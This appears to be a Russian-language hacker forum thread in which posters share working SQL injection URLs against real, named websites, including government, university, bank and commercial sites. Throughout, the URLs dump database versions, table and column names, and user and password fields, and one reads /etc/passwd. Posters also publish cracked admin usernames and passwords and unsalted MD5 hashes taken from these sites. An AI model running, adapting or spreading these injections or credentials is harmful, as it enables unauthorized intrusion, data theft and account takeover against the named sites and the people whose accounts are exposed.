еще гов)) maps2.nris.mt.gov Code: http://maps2.nris.mt.gov/Mapper/MapWindow.asp?Profile=-1+or+1=@@version-- http://maps2.nris.mt.gov/Mapper/MapWindow.asp?Profile=-1+or+1=(select+system_user)--
www.rusbiz.ru Ресурс представляет из себя многоотраслевой портал с электронной торговой площадкой. Основной целью портала является содействие компаниям малого и среднего бизнеса в расширении сфер своей деятельности, увеличении объемов продаж, нахождении новых деловых связей за рубежом и проведении бизнес сделок через Интернет. Всё бы хорошо, но... Банальный SQL-Injection в параметре servid. Получаем список таблиц: Получаем список полей в заданной таблице: * Обратите внимание на использование /**/ вместо стандартных вариантов представления пробела... Это вызвано тем, что фходной параметр фильтруется (хоть и криво). Фильтрация делает невозможным использование %20 или + в качестве пробела, также фильтруется =, поэтому пришлось воспользоваться операцией IN. Из интересных таблиц имеем USER и forum_user, но форум по техническим причинам отключён, поэтому дело будем иметь только с первой таблицей. Таблица имеет такую структуру: password - пароль аккаунта в md5 user_group - группа аккаунта (может быть user, admin и т.д.) blocked - активированный аккаунт или нет lastlogin - время последнего посещения Начнём вторжение в святая святых: По данному запросу возвращается две записи pol и systemuser. Это два админских аккаунта. Пароли свёрнуты в md5: pol:890a09778691261d1e1e7c65f6101d3c systemuser:972c97bdc47dfc8def0e74c55da0bbfd В помощь Джон и через пару секунд: pol:51619 systemuser:explore Ну чтож... Админы никогда не научатся проявлять фантазию при задании паролей от критических ресурсов... Должен заметить, что половина базы снимается одним проходом по словарю и прямым брутом по 0...9 в длине 8 символов. Не знаю как быстро прикроют эту багу, ибо такое впечатление, что там админ в онлайне... Но в доказательство приведу ещё один аккаунт: green:1604
cs.xeka.ru движек - psyhostats вот скули.. нашел почти сразу но были проблемы с выводом.. потом пошаманил с лимит 0 помогло [: тут еще много ксс, но пару лишь, нашел пока скули искал много столбцов) вывод всякой инфи 5.0.45-community-nt-logs_mafia:root@localhost 1 STEAM_0:1:пароли сказали потереть::belo4ka 1 2% 3 12.00 2 АЙ-ПИ::LeXXXuS 1 2% 3 12.00 3 АЙ-ПИ::Admir@L 1 2% 3 12.00 4 АЙ-ПИ::belo4ka 1 2% 3 12.00 belo4ka:пароли сказали потереть:1 1 :пароли сказали потереть:1 1 2% 3 12.00 2 :пароли сказали потереть:10 1 2% 3 12.00 з.ы. вывод понравился так как там была таблица не надо было тянуть по одной)) з.з.ы движек сегодня увидел первый раз.. мо там есть еще что-то поинтереснее но рыть особо не стал [: з.з.ы ися был осведомлен) з.з.ы потер пароли и мыла
"раскрутил" скулю Slider'a "попроще" сразу говорю сорри, когда раскручивал не видел что слайдер сам уже раскрутил.. Code: http://anime.kz/index.html?mode=links&pid=6+UNION+SELECT+1,login,3,4,pwd,6,7+from+user/* + своя: Code: http://www.borytucholskie.pl/index.php?id=-1+union+select+1,password+from+users/* пароль, логин - ненашёл Code: http://www.borytucholskie.pl/index.php?id=-1+union+select+1,column_name+from+INFOrMATION_SCHEMA.COLUMnS+WHERE+TABLE_NAME=users+limit+0,1/* http://www.borytucholskie.pl/index.php?id=-1+union+select+1,column_name+from+INFOrMATION_SCHEMA.COLUMnS+WHERE+TABLE_NAME='users'+limit+0,1/* Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /index.php on line 10
2BlackCats Code: http://www.borytucholskie.pl/index.php?id=-1+union+select+1,column_name+from+INFOrMATION_SCHEMA.COLUMnS+WHERE+TABLE_NAME=CHAR(117,115,101,114,115)+limit+1,1/* кавычки фильтруются
Scipio, хм, я не пойму как вы из этого извлекаете логин и пароль? У меня вот появилось в середине страницы: А как из этого пользу извлечь не пойму( объясни плз.
http://theboard.byu.edu/ Code: http://theboard.byu.edu/index.php?area=viewall&id=-1+union+select+version(),user(),concat_ws(0x3a,username,user_password),4,database(),6,7,8,0x6865617679206D6574616C203A44,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+100Hrbb_users+limit+1,1 http://theboard.byu.edu/index.php?area=viewall&id=-1+union+select+1,2,load_file(0x2F6574632F706173737764),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.tables http://primes.utm.edu Code: http://primes.utm.edu/bios/page.php?id=&username=sdf%27+union+select+concat_ws(0x203a20,username,pass),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2,2,2,2,2,2,2,2,2,2,2,2,2,2+FROM+person+limit+1,1/* http://hitl.washington.edu (Postgre 8 без прав, лениво ковырять) Code: http://www.hitl.washington.edu/people/papers.php?name=jksdelly'+union+select+relname,null,null+from+pg_class+where+relname%3C%3E'alum_person'+and+relname%3C%3E'alum_person_alumid_seq'+and+relname%3C%3E'alum_position'+and+''='
Code: http://www.northberwickuk.com/info.php?id=-1+union+select+0,version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,25,26,27/*&catid=324&f=NorthBerwick&type=featured Code: http://www.kinogalerija.lv/info.php?id=-1+union+select+version(),1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/*
Code: http://admiral.delfi.lv/index.php?id=-48390++union+select+1,table_name,3+from+INFORMATION_SCHEMA.TABLES+limit+1,1/*
Code: htp://www.erikdevlieger.com/kunst.php?rq=list&id=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6/* [email protected]:4.1.21-log:imcavas_erikdevlieger Code: http://www.spcompanyspb.com/goods.php?type=-1+union+select+concat(user(),0x3a,version(),0x3a,database())/*&style=5 u7821@localhost:5.0.24-Debian_1-log:u7821: цензуро =\ Code: http://www.fenixbel.com/site.php?id=-1+union+select+concat(user(),0x3a,version(),0x3a,database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/* [email protected]:5.0.45-log:merkator_2222
Code: http://www.tolkien.it/catalogo/item.asp?ID=1+or+1=(SELECT+TOP+1+passw+from+Tadmins+where+username='roby')--
www.chip.ua - сайт журнала CHIP Code: http://www.chip.ua/?page=poll&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/* Скуль так розкрутить не удалось =\ P.S: _http://www.ichip.ru/?page=poll&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/* тот же результат =)
http://www.sgbank.ru/news.asp?news_id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('bankdel','bankseek','cbr','currency_exch','currency_opt','currency_zayavka','doc_req','documents','dtproperties','forums','keybaseb','keybasef','messages','news1'))-- baser192:12345
Google Page Rank 8/10 WebAlta WTR 9/10 4-ая версия.. логин+пароль: Code: http://www.mnogosearch.org/bugs/bugs.php?id=-1+union+select+1,2,pass,4,5,6,7,8,9,user,11,12,13,14,15,16+from+user/* логин: bar хэш пасса: 948f878a52bb69d5e54fe8d04dcddfd5